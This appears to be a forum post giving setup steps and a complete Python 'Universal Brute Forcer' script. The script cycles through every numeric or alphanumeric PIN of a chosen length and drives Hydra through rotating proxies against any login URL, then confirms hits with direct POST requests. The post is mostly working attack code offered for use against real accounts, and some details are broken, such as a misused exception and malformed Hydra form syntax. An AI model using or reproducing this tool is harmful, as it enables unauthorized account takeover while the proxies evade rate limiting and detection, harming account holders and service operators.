1. Confirm the presence of a compatible milieu with Hydra and Proxychains installed.
2. Create a file titled "proxies.txt" in the same directory as the script, containing your proxy list.
3. Preserve the script to a file e.g. "bruteforce.py".
4. Maneuver to the directory containing all files in the terminal.
5. Execute the script using Python e.g. "python bruteforce.py".
Script:
Code: Select all
import subprocess
import itertools
import time
import requests
import string
import threading
from queue import Queue
# Function to read proxies from a file
def load_proxies(filename):
try:
with open(filename, 'r') as file:
proxies = file.read().splitlines()
return proxies
except FileNotFoundError:
print(f"Error: The file {filename} was not found.")
return []
# Function to select PIN type
def select_pin_type():
while True:
print("\nSelect the type of PINs to test:")
print("1. Numeric PINs (0-9)")
print("2. Alphanumeric PINs (A-Z) + (0-9)")
print("3. Alphanumeric PINs (A-Z) + (a-z) + (0-9)")
choice = input("Enter your choice (1/2/3): ").strip()
if choice in ['1', '2', '3']:
return choice
else:
print("Invalid choice. Please try again.")
# Function to select PIN length
def select_pin_length():
while True:
length = input("\nEnter the number of characters for the PINs (e.g., 4, 6, 8): ").strip()
if length.isdigit() and int(length) > 0:
return int(length)
else:
print("Invalid length. Please enter a positive integer.")
# Function to generate combinations based on the choice and length
def generate_combinations(choice, length):
if choice == '1':
characters = string.digits
elif choice == '2':
characters = string.ascii_uppercase + string.digits
elif choice == '3':
characters = string.ascii_letters + string.digits
return itertools.product(characters, repeat=length)
# Function to chunk combinations into smaller batches
def chunk_combinations(combinations, chunk_size):
chunk = []
for combo in combinations:
chunk.append(combo)
if len(chunk) == chunk_size:
yield chunk
chunk = []
if chunk:
yield chunk
# Function to run the Hydra command
def run_hydra_command(pin, proxy, target_url, username, success_indicator):
proxychains_conf = f"""
strict_chain
proxy_dns
[ProxyList]
{proxy}
"""
with open("proxychains_temp.conf", "w") as f:
f.write(proxychains_conf)
command = f"proxychains4 -q -f proxychains_temp.conf hydra -l {username} -p {pin} {target_url} https-post-form '{target_url}:S=^USER^:F={success_indicator}'"
print(f"Attempting PIN: {pin} with proxy {proxy}")
result = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = result.stdout.decode('utf-8')
stderr = result.stderr.decode('utf-8')
if "1 valid password found" in stdout:
print(f"Hydra claims valid PIN found: {pin}. Verifying...")
return True, stdout, stderr
else:
return False, stdout, stderr
# Function to verify the PIN automatically by detecting success and failure
def verify_pin(pin, verification_url, verification_data):
verification_data["pin"] = pin
response = requests.post(verification_url, data=verification_data, allow_redirects=False)
response_text = response.text
response_status = response.status_code
# Detect success and failure by checking common indicators
if response_status in [200, 302]: # Adjust based on common success codes
if "error" not in response_text and "invalid" not in response_text:
return True, response_status, response_text
return False, response_status, response_text
# Worker function for threading
def worker(pin_queue, proxy_pool, target_url, username, success_indicator, valid_pins, combinations_chunk):
while not pin_queue.empty():
try:
pin = pin_queue.get_nowait()
except Queue.Empty:
break
proxy = next(proxy_pool)
success, stdout, stderr = run_hydra_command(pin, proxy, target_url, username, success_indicator)
if success:
verification_url = target_url # Assuming verification URL is the same as target URL
verification_data = {"pin": pin}
is_valid, status_code, response_text = verify_pin(pin, verification_url, verification_data)
if is_valid:
valid_pins.append(pin)
print(f"Successful PIN found: {pin}")
print(f"Verification response: {status_code}")
else:
print(f"Verification failed for PIN: {pin}, Response: {status_code}")
else:
print(f"Invalid PIN: {pin}")
time.sleep(1)
# Refill queue if empty
if pin_queue.empty():
try:
current_chunk = next(combinations_chunk)
for pin_tuple in current_chunk:
pin_queue.put(''.join(pin_tuple))
except StopIteration:
return
def main():
print("Welcome to the Universal Brute Forcer Script")
# User inputs
proxy_file = input("Enter the filename for the proxies (e.g., proxies.txt): ").strip()
proxies = load_proxies(proxy_file)
if not proxies:
return
proxy_pool = itertools.cycle(proxies)
choice = select_pin_type()
length = select_pin_length()
combinations = generate_combinations(choice, length)
target_url = input("Enter the full target URL including the login path (e.g., https://example.com/login): ").strip()
username = input("Enter the username for Hydra to use: ").strip()
success_indicator = input("Enter the failure indicator for the login form (e.g., error=1): ").strip()
valid_pins = []
# Prepare PIN combinations
chunk_size = 1000
pin_queue = Queue()
combinations_chunk = chunk_combinations(combinations, chunk_size)
current_chunk = next(combinations_chunk)
for pin_tuple in current_chunk:
pin_queue.put(''.join(pin_tuple))
# Start threading
threads = []
num_threads = int(input("Enter the number of threads to use: ").strip())
for _ in range(num_threads):
t = threading.Thread(target=worker, args=(pin_queue, proxy_pool, target_url, username, success_indicator, valid_pins, combinations_chunk))
t.start()
threads.append(t)
for t in threads:
t.join()
# Print summary of valid PINs
print("Script finished. Valid PINs found:")
if valid_pins:
for pin in valid_pins:
print(pin)
else:
print("No valid PINs found.")
if __name__ == "__main__":
main()